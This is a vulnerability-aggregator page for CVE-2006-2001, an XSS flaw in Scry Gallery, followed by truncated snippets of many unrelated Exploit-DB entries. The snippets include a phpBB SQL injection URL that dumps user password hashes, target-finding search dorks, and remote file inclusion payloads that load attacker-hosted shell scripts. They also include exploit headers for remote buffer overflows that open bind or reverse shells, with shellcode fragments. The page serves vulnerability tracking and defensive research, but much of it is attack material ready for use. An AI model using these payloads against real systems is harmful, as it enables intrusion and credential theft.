CVE-2006-2001
published 2006-04-25CVE-2006-2001: Cross-site scripting (XSS) vulnerability in index.php in Scry Gallery 1.1 allows remote attackers to inject arbitrary web script or HTML via the p parameter…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
2.30%
81.1th percentile
Cross-site scripting (XSS) vulnerability in index.php in Scry Gallery 1.1 allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: this is a different vulnerability than the directory traversal vector.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| scry_gallery | scry_gallery | — | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-w8qm-qm5m-qp68: Cross-site scripting (XSS) vulnerability in index
ghsa_unreviewed·2022-05-01
CVE-2006-2001 [MEDIUM] GHSA-w8qm-qm5m-qp68: Cross-site scripting (XSS) vulnerability in index
Cross-site scripting (XSS) vulnerability in index.php in Scry Gallery 1.1 allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: this is a different vulnerability than the directory traversal vector.
Red Hat
CVE-2006-1017: The c-client library 2000, 2001, or 2004 for PHP before 4
vendor_redhat·CVSS 9.3
CVE-2006-1017 [CRITICAL] CVE-2006-1017: The c-client library 2000, 2001, or 2004 for PHP before 4
The c-client library 2000, 2001, or 2004 for PHP before 4.4.4 and 5.x before 5.1.5 do not check the (1) safe_mode or (2) open_basedir functions, and when used in applications that accept user-controlled input for the mailbox argument to the imap_open function, allow remote attackers to obtain access to an IMAP stream data structure and conduct unauthorized IMAP actions.
Statement: We do not consider safe_mode / open_basedir restriction bypass issues being security sensitive. For more details see http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=169857#c1 and http://www.php.net/security-note.php
No detection rules found.
Exploit-DB
Fully Modded phpBB - 'kb.php' SQL Injection
exploitdb·2008-03-12
CVE-2008-1350 Fully Modded phpBB - 'kb.php' SQL Injection
Fully Modded phpBB - 'kb.php' SQL Injection
---
# Powered by phpBB © 2001, 2006 phpBB Group
# Modified by Fully Modded phpBB © 2002, 2006
#
#########################################################################
#
# AUTHOR : TurkishWarriorr
#
# HOME : http://www.1923turk.org
#
#########################################################################
#
# DORKS 1 : allinurl :kb.php?mode=article&k
# DORKS 2 : article&k=
# DORKS 3 : "Powered by phpBB © 2001, 2006 phpBB Group" "Modified by Fully Modded phpBB © 2002, 2006"
#
##########################################################################
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1
#####
Exploit-DB
Advanced Poll 2.0.5-dev - Remote Admin Session Generator
exploitdb·2007-02-07
CVE-2007-0845 Advanced Poll 2.0.5-dev - Remote Admin Session Generator
Advanced Poll 2.0.5-dev - Remote Admin Session Generator
---
#!/usr/bin/perl -w
# Advanced Poll 2.0.0 >= 2.0.5-dev textfile admin session gen.
#
#
# 0day! KEEP IT PRIVATE 0day!
#
# date: 30/07/06
#
# diwou
#
# PHCKSEC (c) 2001-2006.
#
# see templates for code execution ;).
use strict;
use warnings;
use LWP::UserAgent;
use MD5;
my ($lwp,$agent,$out,$url,$proxy)=(undef,undef,undef,$ARGV[0],$ARGV[1]);
my %zday=
(
username => 'jakahw4nk4h',
'pollvars[poll_username]' => 'jakahw4nk4h',
password => 'fuckoff',
'pollvars[poll_password]' => ''
);
$zday{'pollvars[poll_password]'}=&md5($zday{password});
$agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter.
#$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/
Exploit-DB
NetBSD - 'FTPd / Tnftpd' Remote Stack Overflow (PoC)
exploitdb·2006-11-30
CVE-2006-6652 NetBSD - 'FTPd / Tnftpd' Remote Stack Overflow (PoC)
NetBSD - 'FTPd / Tnftpd' Remote Stack Overflow (PoC)
---
#!perl
# $$$ NetBSD ftpd and ports *Remote ROOOOOT $HOLE$* $$$
#
# About
#
# tnftpd is a port of the NetBSD FTP server to other systems.
# It offers many enhancements over the traditional BSD ftpd,
# including per-class configuration directives via ftpd.conf(5),
# RFC 2389 and draft-ietf-ftpext-mlst-11 support, IPv6,
# transfer rate throttling, and more.
# tnftpd was formerly known as lukemftpd,
# and earlier versions are present in Mac OS X 10.2 (as ftpd)
# and FreeBSD 5.0 (as lukemftpd).
#
# Description
#
# The NetBSD ftpd and the tnftpd port suffer from a remote stack overrun,
# which can lead to a root compromise.
#
# The bug is in glob.c file. The globbing mechanism is flawed as back in
# 2001.
#
# To trigger the overflow you
Exploit-DB
NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
exploitdb·2006-09-27
CVE-2006-5112 NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
---
/*
navi_exp.c
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:\>navi_exp 192.168.0.1 0
[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
[*] Coded by h07
[+] Sending buffer: OK
[*] Check your shell on 192.168.0.1:4444
[*] Press enter to quit
C:\>nc -v 192.168.0.1 4444
[192.168.0.1] 4444 (?) open
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\windows\system32>
*/
#include
#define PORT 80
#define BUFF_SIZE 1024
typedef struct
{
char os_name[32];
unsigned long ret;
} target;
char shellcode[] =
/*
Win32_bind shellcode
Encoder: PexFnstenvMov
Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f
Thx metasploit.c
Exploit-DB
phpGroupWare 0.9.16.010 - 'GLOBALS[]' Remote Code Execution
exploitdb·2006-08-29
CVE-2006-4458 phpGroupWare 0.9.16.010 - 'GLOBALS[]' Remote Code Execution
phpGroupWare 0.9.16.010 - 'GLOBALS[]' Remote Code Execution
---
#!/usr/bin/php -q -d short_open_tag=on
calendar/inc/class.holidaycalc.inc.php line 14-33:
....
/* $Id: class.holidaycalc.inc.php,v 1.5 2001/08/26 12:32:28 skeeter Exp $ */
if (empty($GLOBALS['phpgw_info']['user']['preferences']['common']['country']))
{
$rule = 'US';
}
else
{
$rule = $GLOBALS['phpgw_info']['user']['preferences']['common']['country'];
}
$calc_include = PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_'.$rule.'.inc.php';
if(@file_exists($calc_include))
{
include($calc_include);
}
else
{
include(PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_US.inc.php');
}
....
ex:
http://www.site.com/[phpGroupWare_path]/calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=..
Exploit-DB
Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
exploitdb·2006-08-21
CVE-2006-4318 Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
---
/*
* wftpd_exp.c
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
* coded by h07
* tested on XP SP2 polish, 2000 SP4 polish
* example..
C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
[*] coded by h07
[*] FTP response: 331 Give me your password, please
[*] FTP response: 230 Logged in successfully
[+] sending buffer: ok
[*] press enter to quit
C:\>nc -l -p 4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\wftpd323>
*/
#include
#include
#define BUFF_SIZE 1024
#define PORT 21
//win32 reverse shellcode (metasploit.com)
char shellcode[] =
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x
Exploit-DB
Microsoft Windows - CanonicalizePathName() Remote (MS06-040)
exploitdb·2006-08-19
CVE-2006-3439 Microsoft Windows - CanonicalizePathName() Remote (MS06-040)
Microsoft Windows - CanonicalizePathName() Remote (MS06-040)
---
/*
Microsoft Windows CanonicalizePathName() Remote Overflow MSO6-040
More info: http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx
Written by Preddy
This is another version of hdm's metasploit version but ported to C,
Works against Windows XP SP1
And it should give a crash on Win2k in services.exe
On successfull exploitation it provides a remote shell at port 54321
of your victim:
./ms06 192.168.1.103
Target: 192.168.1.103
Attack Finished: now open a new terminal and nc to your victim on port 54321
Warning: Don't close this window!
[open a new terminal/window/prompt]
nc 192.168.1.103 54321
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
http://www.te
Exploit-DB
MyNewsGroups 0.6b - 'myng_root' Remote Inclusion
exploitdb·2006-07-31
CVE-2006-3966 MyNewsGroups 0.6b - 'myng_root' Remote Inclusion
MyNewsGroups 0.6b - 'myng_root' Remote Inclusion
---
+--------------------------------------------------------------------
+
+ MyNewsGroups :) v. 0.6b <= Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: MyNewsGroups :) v. 0.6b
+ Venedor ...........: http://mynewsgroups.sourceforge.net
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code /lib/tree/layersmenue.inc.php:
+
+ .....
+ <?php
+ // PHP Layers Menu 2.3.5 (C) 2001-2003 Marco Pratesi (marco at te
Exploit-DB
eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
exploitdb·2006-07-27
CVE-2006-3838 eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
---
#!/usr/bin/perl -w
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by Titon of Bastard Labs.
#
# http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
#
# Exploit for * Security Analyzer by eiQnetworks (OEM for Several vendors)
#
# kfinisterre@kfinisterre01:~$ ./eiQ_multi.pl 2 192.168.0.13
# *** Target: NetworkSecurityAnalyzerv4.2.27.exe, Len: 1262
# Exploiting 192.168.0.13
# kfinisterre@kfinisterre01:~$ telnet 192.168.0.13 4444
# Trying 192.168.0.13...
# Connected to 192.168.0.13.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Network Security Analyzer\fwa>exit
#
Exploit-DB
phpMyDirectory 10.4.4 - 'ROOT_PATH' Remote File Inclusion
exploitdb·2006-05-19
CVE-2006-2521 phpMyDirectory 10.4.4 - 'ROOT_PATH' Remote File Inclusion
phpMyDirectory 10.4.4 - 'ROOT_PATH' Remote File Inclusion
---
Title : phpMyDirectory <= 10.4.4 Remote File Inclusion Vulnerability
-
URL : http://www.phpmydirectory.com/
-
Dork : "powered by phpmydirectory" or intext:"2001-2006 phpMyDirectory.com"
-
Author : OLiBekaS
-
contact : olibekas[at]gmail.com
-
greetz : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
-
Exploit : http://[target]/[path]/cron.php?ROOT_PATH=http://[attacker]/cmd.txt?&cmd=ls
# milw0rm.com [2006-05-19]
Exploit-DB
phpListPro 2.01 - Multiple Remote File Inclusions
exploitdb·2006-05-08
CVE-2006-2323 phpListPro 2.01 - Multiple Remote File Inclusions
phpListPro 2.01 - Multiple Remote File Inclusions
---
Title: phpListPro <= 2.01 - Remote File Include Vulnerability
Vendor: SmartISoft
URL: http://smartisoft.com
Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
Search for: "PHPListPro ©2001-2006 SmartISoft"
Exploitation:
/config.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
/editsite.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
/in.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
/addsite.php?returnpath=http://mitglied.lycos.de/n0ssy/r57.txt?&cmd=ls
# milw0rm.com [2006-05-08]
Exploit-DB
Scry Gallery 1.1 - 'index.php' Cross-Site Scripting
exploitdb·2006-04-24
CVE-2006-2001 Scry Gallery 1.1 - 'index.php' Cross-Site Scripting
Scry Gallery 1.1 - 'index.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17668/info
Scry Gallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Scry Gallery version 1.1 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/[Path to scry gallery]/index.php?v=list&i=0&p=var%20variable=111111111111111111;alert(variable);
Exploit-DB
Apple Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell Redirection Race Condition
exploitdb·2000-01-02
CVE-2000-1134 Apple Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell Redirection Race Condition
Apple Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell Redirection Race Condition
---
source: https://www.securityfocus.com/bid/2006/info
bash, tcsh, cash, ksh and sh are all variations of the Unix shell distributed with many Unix and Unix clone operating systems. A vulnerability exists in these shells that could allow an attacker to arbitrarily write to files.
A vulnerability has been discovered in a number of Unix shells which may allow a local attacker to corrupt files or potentially elevate privileges.
Scripts and command line operations using in an October 29th, 2001 BugTraq posting:
/tmp# echo 'hello world' > rootfile
/tmp# chmod 600 rootfile
/tmp# ln -s rootfile sh$$
/tmp# chown -h 666.666 sh$$
/tmp# ls -l rootfile sh$$
-rw------- 1 root root 12
No writeups or analysis indexed.
http://attrition.org/pipermail/vim/2006-April/000716.htmlhttp://secunia.com/advisories/19777http://securityreason.com/securityalert/783http://www.osvdb.org/24891http://www.securityfocus.com/archive/1/431853/100/0/threadedhttp://www.securityfocus.com/bid/17668http://www.vupen.com/english/advisories/2006/1490https://exchange.xforce.ibmcloud.com/vulnerabilities/26101http://attrition.org/pipermail/vim/2006-April/000716.htmlhttp://secunia.com/advisories/19777http://securityreason.com/securityalert/783http://www.osvdb.org/24891http://www.securityfocus.com/archive/1/431853/100/0/threadedhttp://www.securityfocus.com/bid/17668http://www.vupen.com/english/advisories/2006/1490https://exchange.xforce.ibmcloud.com/vulnerabilities/26101
2006-04-25
Published